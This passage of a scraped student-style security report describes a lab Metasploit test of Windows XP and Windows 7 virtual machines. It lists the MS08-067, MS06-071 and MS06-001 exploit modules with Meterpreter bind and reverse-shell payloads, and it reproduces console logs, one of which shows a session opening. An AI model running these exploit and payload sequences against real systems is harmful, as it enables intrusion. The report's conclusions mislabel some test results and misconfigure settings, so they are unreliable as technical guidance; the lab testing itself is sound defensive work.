Type : Remote RPC serviceTCP Port : 49299
IP : 192.168.0.171
Nessus ID : 10736
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 59/73
PAGE | 59
PENETRATION TESTING (METASPLOIT)
Metasploit, specifically the Metasploit Framework is an open-source tool used for
penetration testing and signature development. The tool presents nearly endless combinations of
exploits and payloads that can be used to test multiple aspects of a remote machine's security. As
such, it was used to test penetrable points in both the Windows XP and Windows 7 virtualmachines. This was done using the following combination of exploits and payloads.
The exploit and payload information was taken from the information dialogs provided
within Metasploit 3.3. Following the exploit and payload information are the test results from the
remote host testing. Six tests were performed on each virtual machine, and the test process is
detailed. For complete installation and setup of Metasploit reference the Vantage Point Computing
Policy Document.
EXPLOITS
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
Command: msf > windows/smb/ms08_067_netapi
Version: 5888
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Payload information:
Space: 400
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server
Service. This module is capable of bypassing NX on some operating systems and service packs. The
correct target must be used to prevent the Server Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This is just the first version of thismodule, full support for NX bypass on 2003, along with other platforms, is still in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 60/73
PAGE | 60
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
Command: msf > windows/browser/ms06_071_xml_core
Version: 5773
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Payload information:
Space: 1024
Avoid: 1 character
Description:
This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in
the XMLHTTP ActiveX control. This module is the modified version of
http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully
tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft
XML Core Services 4.0 SP2.
References:
http://www.microsoft.com/technet/security/bulletin/MS06-071.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5745
http://www.securityfocus.com/bid/20915
http://www.osvdb.org/29425
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 61/73
PAGE | 61
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
Command: msf > windows/browser/ms06_001_wmf_setabortproc
Version: 7611
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Payload information:
Space: 1040
Avoid: 1 characters
Description:
This module exploits a vulnerability in the GDI library included with Windows XP and 2003. Thisvulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProcprocedure. This module generates a random WMF record stream for each request.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560
http://www.osvdb.org/21987
http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx
http://www.securityfocus.com/bid/16074http://www.microsoft.com/technet/security/advisory/912840.mspx
http://wvware.sourceforge.net/caolan/ora-wmf.html
http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 62/73
PAGE | 62
PAYLOADS
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
Command: msf> windows/meterpreter/bind_tcp
Version: 7075, $Revision$, 7546
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 298
Description:
Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
Command: msf> windows/meterpreter/reverse_tcp
Version: 7217, $Revision$, 7546
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 290
Description:
Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injectionpayload
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 63/73
PAGE | 63
WINDOWS XP
TEST 1
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
TEST 2
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.0.166
lhost => 192.168.0.166
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 64/73
PAGE | 64
TEST 3
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcppayload => windows/meterpreter/bind_tcp
msf exploit(ms06_071_xml_core) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/Ylyb4Hd
[*] Local IP: http://192.168.0.196:8080/Ylyb4Hd
[*] Server started.
TEST 4
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_071_xml_core
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms06_071_xml_core) > set lhost 192.168.0.166
lhost => 192.168.0.166
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/VCk957jpkpSW6J3
[*] Local IP: http://192.168.0.196:8080/VCk957jpkpSW6J3
[*] Server started.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 65/73
PAGE | 65
TEST 5
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortprocmsf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/I0R0jq7Efcxn08
[*] Local IP: http://192.168.0.196:8080/I0R0jq7Efcxn08
[*] Server started.
TEST 6
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTIONWINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.166
lhost => 192.168.0.166
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 66/73
PAGE | 66
msf exploit(ms06_001_wmf_setabortproc) >
[*] Using URL: http://0.0.0.0:8080/c5wMfJ8gXdTk
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.196:8080/c5wMfJ8gXdTk [*] Server started.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 67/73
PAGE | 67
WINDOWS 7
TEST 1
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bindtcp
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
TEST 2
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.0.171
lhost => 192.168.0.171
msf exploit(ms08_067_netapi) > set rhost 192.168.0.171
rhost => 192.168.0.171
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 68/73
PAGE | 68
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
TEST 3
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/browser/ms06_071_xml_core
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
msf exploit(ms06_071_xml_core) > [*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/H2MNFt9yRjH4N0q
[*] Local IP: http://192.168.0.196:8080/H2MNFt9yRjH4N0q
[*] Server started.
TEST 4
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_071_xml_core
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 69/73
PAGE | 69
msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_071_xml_core) > set lhost 192.168.0.171
lhost => 192.168.0.171msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
msf exploit(ms06_071_xml_core) > [*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/m8MRYtwpxBsaeP
[*] Local IP: http://192.168.0.196:8080/m8MRYtwpxBsaeP
[*] Server started.
TEST 5
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/LJTnPF9ZUf
[*] Local IP: http://192.168.0.196:8080/LJTnPF9ZUf
[*] Server started.
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 70/73
PAGE | 70
[*] Started bind handler
[*] Sending exploit to 192.168.0.196:1199...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.196:1201 -> 192.168.0.196:4444)
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 71/73
PAGE | 71
TEST 6
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortprocmsf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.171
lhost => 192.168.0.171
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) > [*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/JfNUisgBdnRRa
[*] Local IP: http://192.168.0.196:8080/JfNUisgBdnRRa
[*] Server started.
[*] Sending exploit to 192.168.0.196:1267...
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 72/73
PAGE | 72
CONCLUSION
As with any scientific test, empirical evidence must be presented in order to draw legitimate
conclusions. In addition to this, test results must be corroborated in order to verify authenticity.This is the reason that multiple tools were used to test the security of the two remote machines (the
virtual machines). While NMap, Nessus, and Metasploit have different specialties, they are all
necessary pieces of a larger puzzle - computer security.
In order to fully verify true security, the tools must be considered together. For instance,
basing results strictly on NMap scans would yield the conclusion that Windows XP is far more
secure that Windows 7. This would be due to the fact that Windows XP has no unfiltered ports and
Windows 7 has seven "open ports." However, the Nessus scan concludes that Windows XP has five
open ports and Windows 7 has twelve. Additionally, there are multiple low vulnerabilities present
in each operating system.
The vulnerabilities present in each operating system have the same underlying processes:Server Message Block (SMB) and Distributed Computing Environment (DCE). SMB is an
application-layer protocol that provides shared access to computing resources like files, printers,
and ports. Reducing it to the most basic level, it functions as the "Microsoft Windows Network."
DCE is a software system that functions as a framework for client/server interactions. The most
pertinent aspect is the remote procedure call system which allows work to be performed across
multiple computers.
While the aforementioned processes are both issues, the important thing to consider is their
presence in the operating systems. These vulnerabilities are not limited to one particular version of
the Windows operating system (though Windows 7 does have more low priority vulnerabilities);
they are present in both of them. These vulnerabilities exist below average user interaction, so they
remain invisible to most users.
This is why they are the most dangerous types of vulnerabilities because they require no
out-of-the-box user configuration to compromise the system. For instance, installing iTunes,
Winamp, or MediaMonkey will make the system vulnerable in certain ways. Users sign-up for these
vulnerabilities when the install the programs. Because of this, Metasploit exploit and payload
combinations were chosen that target vulnerabilities related to base level functionality like SMB,
DCE, and TCP networking.
Both systems were equally as vulnerable to actual penetration. Metasploit Tests 1 & 2 were
unable to start servers on both the XP and 7 hosts. However, Tests 3 & 4 successfully created
servers on both the Windows XP and 7 machines; a server which was able to successfully open a
corrupt .wmf or image file when the link to the created server was used. This is particularly odd
given the fact that NMap and Nessus reported different open ports and vulnerabilities.
Ultimately, both operating systems have exploitable vulnerabilities that are present, even
with patching and no superfluous programs installed. The lesson is that removing end-users from
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 73/73
the picture does not completely remove potential security issues. Only true diligence on the part of
the security personnel can truly harden a system.
Windows XP is an industrial, no frills operating system that was revolutionary when it was
originally released in 2001. Windows 7 is a multimedia operating system more aimed at the
general public than it is at the enterprise. Given the relative ubiquity of Moore's Law, end-users will
be more familiar with Windows 7 than Windows XP in a year and a half. As such, it makes sense tobegin to learn the Windows 7 platform because it does not lack the base functionality that Windows
Vista had. Windows 7 is basically Windows XP with a better user interface, better user access
control, and more frills. Microsoft may have neglected to patch some of the existing holes, but they
really went back to the drawing board with all the other aspects and it should be integrated into the
enterprise upgrade plan.